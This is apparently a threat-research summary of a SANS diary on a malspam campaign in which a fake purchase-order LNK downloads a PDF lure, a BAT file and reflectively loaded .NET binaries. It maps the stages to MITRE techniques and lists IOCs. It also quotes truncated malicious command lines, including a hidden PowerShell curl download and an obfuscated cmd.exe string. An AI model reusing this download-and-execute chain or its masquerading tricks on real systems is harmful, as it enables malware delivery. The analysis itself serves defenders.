Threat Research

From small LNK to large malicious BAT file with zero VT score

Securonix

An e-mail-based malspam campaign delivered a small LNK dropper that pretends to be a Purchase Order PDF. The LNK ultimately downloads a PDF lure, a BAT file, and two obfuscated .NET binaries that are loaded reflectively in memory, with low VirusTotal detection. #LNK #PowerShell #UniBat #ReflectiveCodeLoading

Keypoints

  • Malspam delivered a disguised LNK attachment named Purchase Order PO007289.pdf.zip that executes malicious code.
  • The LNK’s target string points to cmd.exe, with a long, obfuscated command sequence behind the scenes.
  • The LNK uses a deobfuscation approach involving many environment variables and a “call” step to run payloads.
  • It downloads a PDF lure and opens it in MS Edge, then downloads a batch file (Uni.bat) and executes it.
  • The BAT file copies powershell.exe as Uni.bat.exe and runs a PowerShell-based chain that decrypts, decompresses, and loads two .NET binaries into memory for execution.
  • VirusTotal detections for the BAT and final-stage binaries were low at the time, highlighting detection gaps for multi-stage payloads.
  • Observed MITRE techniques include phishing, user execution, PowerShell and Windows Command Shell, obfuscation, masquerading, virtualization/sandbox evasion, and reflective code loading.

MITRE Techniques

  • [T1566.001] Phishing – The email delivered a malicious attachment designed to appear legitimate as a purchase order. Quote: “The e-mail message was the usual malspam fare trying to appear as a purchase order sent to the recipient…”
  • [T1204.002] User Execution – The chain relies on the user opening the attachment and triggering execution of the payload. Quote: “The e-mail message was the usual malspam fare trying to appear as a purchase order sent to the recipient…”
  • [T1059.001] PowerShell – The final stage uses a PowerShell command with bypass and hidden window flags to download and stage payloads. Quote: “powershell -noprofile -ep bypass -w hidden -c curl -o ‘C:Users[User]AppDataLocalTempPur%njDpgP%e%20Order%20PO007289.pdf’ …”
  • [T1059.003] Windows Command Shell – The LNK command sequence ultimately runs cmd.exe to launch further actions. Quote: “cmd.exe /r %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% …”
  • [T1027] Obfuscated Files or Information – The script is obfuscated, with readable strings appended to a long obfuscated block. Quote: “The obfuscated script came down to the following command.”
  • [T1027.010] Obfuscated Files or Information: Command Obfuscation – The script can be deobfuscated by altering commands (e.g., replacing “call” with “echo”). Quote: “To do this, all we would have to do would be to replace the ‘call’ command with an ‘echo’ command…”
  • [T1497] Virtualization/Sandbox Evasion – The campaign includes techniques associated with avoiding analysis environments. Quote: “Virtualization/Sandbox Evasion”
  • [T1620] Reflective Code Loading – The final stage loads two heavily obfuscated .NET binaries reflectively into memory and executes them. Quote: “two heavily obfuscated .NET binaries – Is then reflectively loaded into memory and executed (using the function RUsyF).”
  • [T1036] Masquerading – The operation uses masquerading to appear legitimate or to disguise utilities. Quote: “Masquerading”
  • [T1036.003] Masquerading: Rename System Utilities – The payloads rename or masquerade system utilities as part of concealment. Quote: “Masquerading: Rename System Utilities”
  • [T1036.007] Masquerading: Double File Extension – The LNK/pdf lure uses a double extension tactic to mislead users. Quote: “Masquerading: Double File Extension”
  • [T1036.008] Masquerading: Masquerade File Type – The overall trick hides the true file type to appear harmless. Quote: “Masquerading: Masquerade File Type”

Indicators of Compromise

  • [IP] Context – Command and control/download server: 85.208.139.229
  • [File] context – Dropper LNK: Purchase%20Order%20PO007289.pdf.lnk – MD5 304a9ab4d385a6d4c8d45002f92342fa, SHA-1 93700d836102ff1c857c880a8cad4b4387d54de9, SHA-256 e3602d0eb7149004ae6cf4befec8c6d61ac391189122744fff4a1de2cdad4aa3
  • [File] context – PDF lure: Purchase%20Order%20PO007289.pdf – MD5 bfd3ae8bb20e06f32f5b46100dc498c2, SHA-1 5b9ccd750f86ad1a022f8d0eba477a86ca08f6b8, SHA-256 448bf205f66888cd2661b3b7531632a4d0f1e91ccc6568de07f0fdb41f4d96f8
  • [File] context – Uni.bat: Uni.bat – MD5 6038fb0dd91fa1e9cca80ea225d8b59b, SHA-1 98d630a01d50675988898185ac8088673409c8a0, SHA-256 8c01ef8b6a9cfa7a80fd5bcb640d68a63ef17dd25ea3e260c7971b1fa156c8be

Read more: https://isc.sans.edu/diary/From+small+LNK+to+large+malicious+BAT+file+with+zero+VT+score/30094/